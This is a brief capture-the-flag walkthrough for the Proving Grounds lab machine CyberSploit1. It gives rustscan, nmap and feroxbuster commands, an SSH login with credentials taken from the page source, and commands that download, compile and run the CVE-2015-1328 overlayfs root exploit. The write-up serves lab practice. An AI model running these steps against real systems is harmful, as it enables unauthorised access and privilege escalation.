Pg Cybersploit1 Linux | proving-grounds

NETWORK

rustscan -a 192.168.120.92

Open 192.168.120.92:22
Open 192.168.120.92:80

nmap -sCV -p22,80 192.168.120.92
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-20 13:34 EDT
Nmap scan report for 192.168.120.92
Host is up (0.018s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Hello Pentester!
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ENUMERATION

Directories scan

The following scan has found few things

feroxbuster --url  http://192.168.120.92 --wordlist /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -v -n -k -x php,html,txt

FOOTHOLD

The homepage shows

and the source show a potential username: itsskv

We have found

Using the information itsskv / cybersploit{youtube.com/c/cybersploit} we can access SSH

PRIV ESCALATION

Abusing overlayfs

We have found CVE-2015-1328

wget https://www.exploit-db.com/download/37292

gcc 37292.c -o 37292-exploit
chmod +x 37292-exploit 
./37292-exploit

PG — CyberSploit1 — Walkthrough (Offensive Security Proving Grounds Play Boxes) [ proving-grounds ]

NETWORK

ENUMERATION

Directories scan

FOOTHOLD

PRIV ESCALATION

Abusing overlayfs

Categories

Recent Write-ups

Recent Posts

Tags